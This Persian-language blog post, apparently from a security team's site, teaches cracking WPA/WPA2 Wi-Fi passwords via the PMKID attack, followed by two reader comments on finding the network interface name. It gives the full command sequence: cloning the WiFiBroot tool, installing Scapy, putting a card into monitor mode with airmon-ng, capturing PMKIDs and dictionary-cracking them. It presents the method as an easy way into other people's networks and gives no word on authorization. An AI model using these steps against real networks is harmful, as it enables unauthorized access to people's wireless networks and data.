02128428905

آموزش کرک پروتکل امنیتی Wpa/Wpa2 با استفاده از PMKID

 

سلام خدمت تمامی کاربران عزیز وبسایت تیم امنیتی اولترا

 

شبکه های وایرلس امروزه بسیار استفاده میشوند به طوری که در هر خونه ای حداقل یک دستگاه وایرلس قرار دارد, به دلیل دسترسی پذیری بسیار بالایی که شبکه های وایرلس دارن بیشتر در معرض خطر هستن اگر بخوام یه مثال بزنم فرض کنید یک شبکه وایرلس در خونتون دارید به جز خودتون بقیه هم میتونن با داشتن یک کارت شبکه وایرلس امواج شبکه وایرلس شما رو دریافت کنن و سعی کنن با روش های مختلف وارد شبکه شما بشن , پروتکل Wpa2 یکی از قدرتمندترین پروتکل های امنیتی شبکه های وایرلس است , شکستن این پروتکل امنیتی کار بسیار زمان بری هست ولی خب نگران نباشید همیشه یک راه آسون تر وجود داره 🙂

 

 

 

 

روش کرک Wpa/Wpa2 با PMKID :

 

 

روش کرک پروتکل امنیتی Wpa/Wpa2 از طریق PMKID روشی جدید هست و تقریبا در همه مودم روترها که از شبکه های ۸۰۲٫۱۱i/p/q/r استفاده می کنند کار می کند. شخص نفوذگر در این حمله میتونه مستقیما از طریق Accsess Point و بدون نیاز به ترافیک کلاینت درخواست PMKID رو بدهد و بعد از اون برای رسیدن به پسورد شروع به کرک کردن PMKID میکنیم ، کرک کردن در این روش بستگی به پیچیدگی پسورد دارد و اگر از پسورد پیچیده ای استفاده شده باشد مدت زمان بیشتری رو برای کرک از شما خواهد گرفت.

 

 

 

 

 

 

خب بریم سراغ کارمون با دستور زیر ابزار WiFiBroot رو دانلود میکنیم

 

 

git clone https://github.com/hash3liZer/WiFiBroot

 

 

این ابزار با زبان پایتون نوشته شده و ما برای استفاده از این ابزار باید ماژول Scapy رو نصب کنیم

 

 

sudo pip install scapy==2.4.0

 

 

 

بعد از نصب ماژول Scapy ما میتونیم از ابزار استفاده کنیم ، این ابزار چهار mode مختلف داره که هر کدوم از این mode ها یکی از حملات رو انجام میده که برای انجام این حمله ما از mode 2 و mode 3 این ابزار استفاده میکنیم.

 

 

برای گذاشتن کارت شبکه وایرلس روی حالت مانیتورینگ از دستور زیر استفاده کنید به جای wlan0 اسم اینترفیس کارت شبکه خودتون رو وارد کنید

 

airmon-ng start wlan0

 

 

 

خب الان باید شروع به کپچر کردن بکنیم با دستور زیر میتونید اینکار رو انجام بدید به صورت پیش فرض تمامی اکسس پوینت های موجود رو کپچر میکنه ولی شما میتونید فیلتر کنید براساس Essid و Bssid

 

 

python wifibroot.py --mode 2 -i wlan1mon --verbose -d dicts/list.txt -w output.txt

 

 

 

بعد از کپچر کردن باید شروع کنیم به کرک و با دستور زیر میتونید عملیات کرک رو شروع کنید

 

python wifibroot.py --mode 3 --type pmkid --verbose -d dicts/list.txt --read output.txt

 

 

اگر ابزار موفق به کرک بشه پسورد اکسس پوینت رو به شما نمایش میده و میتونید به راحتی پسورد رو وارد کنید و به اکسس پوینت متصل بشید

 

 

 

امیدوارم که از این مطلب هم لذت کافی رو برده باشید

 

 

 

عنوان دانلود : دانلود ابزار WiFiBroot
دیدگاه کاربران
  • هیوا محمدزاده 4 اکتبر 2019

    سلام.
    چطور میتونیم اسم اینترفیس کارت شبکه رو پیدا کنیم؟
    و باید اسم اینترفیس کارت شبکه خودمون رو وارد بکینم یا طرف رو؟

    • اشکان مقدس 5 اکتبر 2019

      سلام

      با دستور ifconfig میتونید اسم اینترفیس رو مشاهده کنید

      باید اسم اینترفیس خودتون رو بزنید

ارسال دیدگاه

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *